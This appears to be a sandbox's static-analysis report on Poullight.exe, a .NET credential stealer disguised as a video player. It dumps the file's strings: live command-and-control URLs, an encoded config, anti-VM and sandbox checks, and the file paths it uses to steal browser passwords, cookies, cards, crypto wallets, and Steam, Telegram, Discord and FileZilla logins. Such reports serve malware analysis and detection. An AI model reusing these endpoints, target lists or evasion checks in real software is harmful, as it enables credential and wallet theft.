Static | ZeroBOX

PE Compile Time

2020-03-25 12:49:15

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name      Virtual Address   Virtual Size   Size of Raw Data   Entropy
.text     0x00002000        0x00018954     0x00018a00         6.00279037622
.rsrc     0x0001c000        0x000003a0     0x00000400         2.92655739612
.reloc    0x0001e000        0x0000000c     0x00000200         0.101910425663

Resources

Name         Offset       Size         Language       Sub-language      File type
RT_VERSION   0x0001c058   0x00000348   LANG_NEUTRAL   SUBLANG_NEUTRAL   data

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP`
"InstallConfigStore"
"Software"
"Valve"
"Steam"
{$Accounts}
"MTBF"
"{$MTBF}"
{$ConnectCache}
<settings>PHByb2cucGFyYW1zPllXUnRhVzQ9fE1RPT18TUE9PTwvcHJvZy5wYXJhbXM+PHRpdGxlPlVHOTFiR2xuYUhRPTwvdGl0bGU+PGNwZGF0YT5NSHd3ZkRFeVEwNTFTMnRMU3pGNFRFWnZUVGxRTlRoNlYxaHJSVXhOZURGNU5URjZObGw4TVRKRFRuVkxhMHRMTVhoTVJtOU5PVkExT0hwWFdHdEZURTE0TVhrMU1YbzJXWHd3PC9jcGRhdGE+PHVsZmlsZT5hSFIwY0RvdkwzSjFMWFZwWkMwMU1EY3pOVEk1TWpBdWNIQXVjblV2WlhoaGJYQnNaUzVsZUdVPTwvdWxmaWxlPjxtdXRleD5QTDJkNHZGRWdWYlFkZGRka21zMFpoUWlJMEk8L211dGV4Pg==</settings>
#http://193.56.146.93/grirghrigh.php
nJ1L2hhbmRsZS5waHAR
WBcG91bGxpZ2h0Lhttp://poullight.ru/keys.txt
v4.0.30319
#Strings
__StaticArrayInitTypeSize=10
__StaticArrayInitTypeSize=30
4D53392A6A24D5E801ADA14E79B43F9BEBB79150
02BB62E210497821AE7DFA31D4DEBBE3053AE6F0
<>9__0_0
<CheckVM>b__0_0
<Start>b__0_0
<>c__DisplayClass0_0
<>9__1_0
<CheckVM>b__1_0
<Search>b__0
string_0
Theta0
get_String0
Nullable`1
IEnumerable`1
IEnumerator`1
List`1
Theta1
Microsoft.Win32
user32
BE_To_UInt32
LE_To_UInt32
ToInt32
433175D38B13FFE177FDD661A309F1B528B3F6E2
FFmulX2
lookupPowX2
Func`2
BrowList2
__StaticArrayInitTypeSize=13
1AFB455399A50580CF1039188ABA6BE82F309543
A79D1CAB3772A431E4B9F6FE61023BBAAB3C82A3
8F22C9ECE1331718CBD268A9BBFD2F5E451441E3
__StaticArrayInitTypeSize=1024
Base64
ToInt64
__StaticArrayInitTypeSize=256
SHA_256
2B2EFCE8705595DBB82EBF1334415445B3B3B686
B68637EF60D499620B99E336C59E4865FFC4C5D7
__StaticArrayInitTypeSize=18
__StaticArrayInitTypeSize=28
get_UTF8
MultiplyP8
0C4110BC17D746F018F47B49E0EB0D6590F69939
<Module>
<PrivateImplementationDetails>
2E0C53CCEC1526864168CD43AA7FF5DBE38C24CA
capCreateCaptureWindowA
DATA_BLOB
InitBLOB
EGChromeC
B8DB0CB599EDD82A386D1A154FB3EB9235513DAD
WS_CHILD
UInt32_To_BE
UInt64_To_BE
UInt32_To_LE
UInt64_To_LE
BLOCK_SIZE
BTCDASH
BTCETH
BYTE_LENGTH
MultiplyH
AntiVM
CheckVM
BTCMON
NordVPN
ShiftRightN
System.IO
LOOKUP
WS_POPUP
MultiplyP
ROUNDS
CRYPTPROTECT_PROMPTSTRUCT
CYCLE_COUNT
ExponentiateX
FFmulX
value__
cbData
pbData
ProtectedData
EncryptedData
FileData
XBufferData
CryptUnprotectData
PropertyData
decrypt_data
System.Web
mscorlib
clearMac
GetMac
System.Collections.Generic
get_Id
path_ad
Thread
path_lad
GET_IVPayLoad
CycleSeed
inSeed
autoSeed
RijndaelManaged
Interlocked
get_InvokeRequired
initialised
pReserved
System.Collections.Specialized
<MacSize>k__BackingField
<Master>k__BackingField
<Key>k__BackingField
RecordHeaderField
Append
set_IsBackground
CBoard
Clipboard
SubWord
ProcessWord
encrypted_password
Replace
GetNonce
set_Mode
CipherMode
SelectSingleNode
XmlNode
UrlDecode
get_Unicode
get_BigEndianUnicode
Encode
encode
FromImage
SendMessage
message
CopyOfRange
Invoke
DoubleScale
ReadTable
ReadMasterTable
EnsureAvailable
IEnumerable
IDisposable
CreateHashtable
ToDouble
NextDouble
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
Rectangle
SqliteFile
ZipFile
dwStyle
get_Name
tableName
GetFileName
fileName
get_MachineName
GetTypeName
GetElementsByTagName
get_FullName
ItemName
get_AlgorithmName
get_UserName
get_ProcessName
digestName
lpszWindowName
sourceDirectoryName
GetDirectoryName
destDirectoryName
username
DateTime
Chrome
chrome
get_NewLine
Combine
AesEngine
LocalMachine
DataProtectionScope
ValueType
OfType
enumType
GetType
atLengthPre
S_atPre
Compare
System.Core
get_Culture
set_Culture
resourceCulture
get_InvariantCulture
Dispose
CCParse
PasswordParse
CookieParse
fillParse
BlockUpdate
DigestUpdate
Create
create
Delegate
EditorBrowsableState
GenerateState
SetApartmentState
Delete
Sqlite
CompilerGeneratedAttribute
GuidAttribute
GeneratedCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
BTCByte
ProcessAadByte
ProcessByte
get_Value
GetEnumValue
minValue
NextCounterValue
get_HasValue
GetValue
maxValue
Recursive
Poullight.exe
get_Size
cbSize
get_MacSize
macSize
_pageSize
_sqlDataTypeSize
GetBlockSize
GetDigestSize
GetUpdateOutputSize
GetOutputSize
Resize
SizeOf
get_ItemOf
IndexOf
xBufOff
bufOff
outOff
outBuf
get_SteamCfg
config
DesktopImg
get_Png
System.Threading
_dbEncoding
GetEncoding
System.Drawing.Imaging
blocksRemaining
running
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
GetString
Substring
System.Drawing
ConvertToULong
NextLong
Org.BouncyCastle.Crypto.Prng
CreatePrng
Sum1Ch
Search
search
ComputeHash
Finish
GetTempPath
GetFolderPath
get_Width
nWidth
get_Length
DataLength
GetByteLength
totalLength
ProcessLength
atLength
GetLength
bitLength
DigestLength
OutputLength
length
WinApi
StringToHGlobalAnsi
Sum0Maj
activate_check
gHASHBlock
macBlock
bufBlock
UnPackBlock
TransformFinalBlock
GetNextCtrBlock
ProcessBlock
atBlock
DecryptBlock
EncryptBlock
path_l
seedVal
AllocHGlobal
FreeHGlobal
Marshal
AddSeedMaterial
gHASHPartial
ProcessPartial
DigestDoFinal
ConstantTimeAreEqual
System.ComponentModel
Kernel32.dll
avicap32.dll
crypt32.dll
System.Xml
Inv_Mcol
Control
WebCam
lParam
wParam
Org.BouncyCastle.Crypto.Modes.Gcm
get_Item
set_Item
System.IO.Compression.FileSystem
SymmetricAlgorithm
HashAlgorithm
DigestAlgorithm
algorithm
SecureRandom
secureRandom
GetRandom
ICryptoTransform
Platform
RootNum
rowNum
get_IsEnum
resourceMan
TimeSpan
CopyFromScreen
get_PrimaryScreen
Pidgin
get_Extension
System.IO.Compression
Information
activation
System.Globalization
System.Web.Script.Serialization
Action
System.Reflection
ICollection
PropertyDataCollection
NameValueCollection
ManagementObjectCollection
ArgumentOutOfRangeException
ArgumentNullException
InvalidOperationException
CryptoException
ArgumentException
exception
pszDescription
forEncryption
StringComparison
CopyTo
FileInfo
CultureInfo
FileSystemInfo
DirectoryInfo
Org.BouncyCastle.Crypto
path_p
Bitmap
path_dp
hwndApp
get_cpp
GenerateLookup
System.Linq
EntryLoader
Downloader
MD5CryptoServiceProvider
StringBuilder
SpecialFolder
AntiReplaySender
Buffer
get_ResourceManager
ManagementObjectSearcher
GetUnderlyingCipher
IBlockCipher
GcmBlockCipher
InitCipher
cipher
IGcmMultiplier
Tables8kGcmMultiplier
multiplier
Handler
System.CodeDom.Compiler
ToUpper
clipper
CurrentUser
KeyParameter
DigestAddCounter
seedCounter
stateCounter
counter
cipher_decrypter
Encrypter
Starter
BitConverter
Exporter
get_Master
IsLetter
ToLower
JavaScriptSerializer
CreateDir
ishi_pidor
IGcmExponentiator
Tables1kGcmExponentiator
IEnumerator
ManagementObjectEnumerator
GetEnumerator
IRandomGenerator
CryptoApiRandomGenerator
DigestRandomGenerator
RandomNumberGenerator
generator
CheckAdministrator
.cctor
Monitor
AES_Decryptor
CreateDecryptor
IntPtr
initHs
Graphics
System.Diagnostics
path_ds
get_TotalSeconds
get_Bounds
CCards
CPasswords
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
Poullight.Properties.Resources.resources
Org.BouncyCastle.Crypto.Modes
DebuggingModes
get_ChildNodes
CCookies
GetDirectories
_masterTableEntries
_tableEntries
Org.BouncyCastle.Utilities
Org.BouncyCastle.Crypto.Utilities
GcmUtilities
DigestUtilities
Poullight.Properties
get_Properties
DFiles
SearchFiles
GetFiles
search_files
_fieldNames
ReadAllLines
Org.BouncyCastle.Crypto.Engines
GetProcesses
FileAttributes
SetAttributes
ProcessAadBytes
_fileBytes
ReadAllBytes
inBytes
AsBytes
ProcessBytes
GetBytes
GetNextBytes
cipherTextBytes
UploadValues
GetLogicalDrives
dwPromptFlags
dwFlags
get_Ticks
Equals
HandlerParams
algorithms
System.Windows.Forms
Contains
System.Web.Extensions
System.Collections
StringSplitOptions
atBlockPos
get_Chars
RuntimeHelpers
browsers
Org.BouncyCastle.Crypto.Parameters
AeadParameters
ICipherParameters
parameters
_class
GetCurrentProcess
HaveSameContents
OneAsUints
Org.BouncyCastle.Crypto.Digests
get_Exists
CheckStatus
Arrays
path_t
Concat
ImageFormat
anus_blyat
Subtract
ManagementBaseObject
DeserializeObject
GetObject
ManagementObject
AVDetect
Unprotect
System.Net
Alphabet
ReadTableFromOffset
offset
ShiftRight
get_Height
nHeight
Poullight
op_Explicit
get_Default
GetValueOrDefault
FirstOrDefault
result
NextInt
ToUpperInvariant
WebClient
System.Management
XmlElement
get_DocumentElement
Increment
SqlStatement
Environment
XmlDocument
hwndParent
get_Current
Content
EntryPoint
get_Count
byteCount
get_TickCount
GetRowCount
pPrompt
InitPrompt
szPrompt
Decrypt
ThreadStart
TrimStart
CheckReplayStart
Convert
Export
FailFast
Sha256Digest
IDigest
GeneralDigest
GetDigest
digest
ProcList
XmlNodeList
ToList
CreateArrayList
output
MoveNext
System.Text
initialAssociatedText
GetAssociatedText
associatedText
ReadAllText
WriteAllText
pPlainText
pCipherText
get_InnerText
GetText
rndProv
get_UtcNow
recursive_max
endIdx
startIdx
startIndex
cfgfix
get_IsPartialBlockOkay
InitializeArray
ToArray
get_Key
set_Key
OpenSubKey
GenerateWorkingKey
GETMasterKey
GetKey
lastKey
RegistryKey
System.Security.Cryptography
get_Assembly
Multiply
SelectMany
DirectoryCopy
pEntropy
IDictionary
CreateDirectory
CreateFromDirectory
TableEntry
SqliteMasterEntry
Registry
capacity
op_Equality
op_Inequality
HttpUtility
Org.BouncyCastle.Security
System.Security
IsNullOrEmpty
3System.Resources.Tools.StronglyTypedResourceBuilder
4.0.0.0
WrapNonExceptionThrows
Video Player V
Copyright
Microsoft 2020
$2c525dfd-c3d9-4b09-b4d3-f30ffc6d3690
1.0.0.0
.NETFramework,Version=v4.5
FrameworkDisplayName
.NET Framework 4.5
_CorExeMain
mscoree.dll
SteamCfg
String0
connect
)(+*,*-*21LKMKNKOKPKQKRK3
{0}BTC-BitCoin
Software
Bitcoin
Bitcoin-Qt
strDataDir
{0}\wallet.dat
{0}\wallets
{0}\wallets\wallet.dat
{0}\info.txt
{0}BitCoin-Qt
"wallet.dat"
{0}BitCoin-Qt
{0}BTC-Bytecoin
{0}bytecoin
.wallet
{0}\{1}
*.wallet
{0}Bytecoin
{0}BTC-Dash
Dash-Qt
{0}Dash-Qt
"wallet.dat"
{0}Dash-Qt
{0}BTC-Ethereum
{0}Ethereum\keystore
{0}Ethereum
{0}BTC-Monero
monero-project
monero-core
wallet_path
{0}Monero
log*ta
we*ata
loc*ate
{0}Browsers
{0}Autofill
{0}Cards
cookie
{0}Browsers\[{1}-{2}] Cookies.txt
AppData\
{0}Autofill\[{1}-{2}] Autofill.txt
{0}Cards\[{1}-{2}] Cards.txt
{0}Browsers\Passwords.txt
{0}Browsers\info.txt
{0}Autofill\info.txt
{0}Cards\info.txt
{0}{1}
: {0}.
: {1}.
: {2}/{3}.
: {4}.
Autofill
Type: {0}
Value: {1}
logins
=====================================
URL: {0}
Login: {0}
Password: {0}
=====================================
cookies
{5}{6}
# Netscape HTTP Cookie File{0}{1}
{0}Pidgin
{0}.purple\accounts.xml
Login:
Password:
Protocol:
{0}\Pidgin.txt
{0}Pidgin
<cpdata>
</cpdata>
{0}Windows Defender.exe
{0}<clbase>{1}</clbase>
{0}NordVPN
NordVPN
NordVpn.exe*
user.config
//setting[@name='Username']/value
//setting[@name='Password']/value
{path}\NordVPN.txt
{0}NordVPN
{0}Clipboard.txt
password
account
\Desktop Files
\Documents Files
\AppData Files
\LocalAppData Files
\Disks Files
windows
programdata
program files (x86)
program files
perflogs
\info.txt
===================================== [LOGS] =====================================
{0}Stealer Files
{0}ScreenShot.png
{0}Discord
{0}discord\Local Storage
{0}\Local Storage
{0}Discord
{0}FileZilla
{0}FileZilla\recentservers.xml
RecentServers
Server
{0}\FileZilla.txt
{0}\recentservers.xml
{0}FileZilla
SELECT * FROM
root\SecurityCenter2
SELECT * FROM AntiVirusProduct
{0}[{1}] {2}
displayName
{0}PC-Information.txt
Software\Microsoft\Windows NT\CurrentVersion
ProductName
Win32_VideoController
Win32_Processor
----------------------------------
----------------------------------
(Injected)
{0}ProcessList.txt
{0}Skype
{0}Microsoft\Skype for Desktop\Local Storage
{0}Skype
{0}\Steam\info.txt
{0}Steam
Windows-1251
"RememberPassword"
"RememberPassword"
"mostrecent"
"mostrecent"
"MTBF"
"Accounts"
"ConnectCache"
{$MTBF}
{$Accounts}
{$ConnectCache}
{0}Steam\
https://steamcommunity.com/profiles/
"SteamID"
{0}Steam
SOFTWARE\Valve\Steam
SteamPath
AutoLoginUser
/config
loginusers.vdf
config.vdf
/loginusers.vdf
/config.vdf
/AccountLogin.TXT
{0}Telegram
{0}Telegram Desktop\tdata
\D877F783D5D3EF8C
\D877F783D5D3EF8C1
\D877F783D5D3EF8C0
\D877F783D5D3EF8C\map1
\D877F783D5D3EF8C\map0
{0}Telegram
{0}WebCam.jpg
VFW Capture
===================================== [LOGS] ====================================={0}{1}
google
yandex
opera software
orbitum
kometa
maxthon
epic browser
comodo
ucozmedia
centbrowser
sputnik
titan browser
acwebbrowser
vivaldi
srware iron
sleipnir
rockmelt
baidu spark
coolnovo
blackhawk
maplestudio
Google\Chrome\User Data
Yandex\YandexBrowser\User Data
Opera Software\Opera Stable
Amigo\User\User Data
Orbitum\User Data
Kometa\User Data
Maxthon\User Data
Torch\User Data
Epic Browser\User Data
Comodo\Dragon\User Data
uCozMedia\Uran\User Data
CentBrowser\User Data
Go!\User Data
Sputnik\User Data
Titan Browser\User Data
AcWebBrowser\User Data
Vivaldi\User Data
Flock\User Data
SRWare Iron\User Data
Sleipnir\User Data
Rockmelt\User Data
Baidu Spark\User Data
CoolNovo\User Data
BlackHawk\User Data
MapleStudio\ChromePlus\User Data
Program has been crashed
desktop
webcam
caption
<title>
</title>
username
c_count
pcount
acount
cd_count
fzilla
b-core
b-byte
b-ethe
avinstall
_version_
connect
{0}{1}{2}
<mutex>
</mutex>
pll_test
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
cmdvrt32.dll
SxIn.dll
SbieDll.dll
sf2.dll
snxhk.dll
HypervisorPresent
os_crypt
encrypted_key
<ulfile>
</ulfile>
{0}\{1}.exe
qwertyuiopasdfghjklzxcvbnm1234567890-_
<settings>
</settings>
<prog.params>
</prog.params>
UNIQUE
Poullight.Properties.Resources
SteamCfg
String0
SHA256
SHA-256
Digest
not recognised.
maxValue
cannot be negative
maxValue cannot be less than minValue
Not an enumeration type
enumType
cipher required with a block size of
Invalid value for MAC size:
invalid parameters passed to GCM
IV must be at least 1 byte
cannot reuse nonce for GCM encryption
Key must be specified in initial init
input buffer too short
Output buffer too short
data too short
mac check in GCM failed
Attempt to process too many blocks
GCM cipher cannot be reused for encryption
GCM cipher needs to be initialised
Key length not 128/192/256 bits.
Should never get here
invalid parameter passed to AES init -
AES engine not initialised
output buffer too short
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
Video Player V
CompanyName
FileDescription
Video Player V
FileVersion
1.0.0.0
InternalName
Poullight.exe
LegalCopyright
Copyright
Microsoft 2020
LegalTrademarks
OriginalFilename
Poullight.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
No antivirus signatures available.
No IRMA results available.